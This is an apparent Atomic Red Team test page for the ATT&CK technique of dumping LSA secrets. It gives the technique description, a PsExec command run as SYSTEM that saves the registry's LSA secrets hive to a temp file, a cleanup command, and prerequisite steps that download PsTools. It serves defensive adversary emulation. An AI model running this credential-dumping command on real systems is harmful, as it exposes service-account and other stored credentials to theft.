T1003.004
OS Credential Dumping: LSA Secrets
Description from ATT&CK
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
Atomic Tests
Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
Supported Platforms: windows
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
Cleanup Commands:
1
del %temp%\secrets >nul 2> nul
Dependencies: Run with powershell!
Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) Check Prereq Commands:
1
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force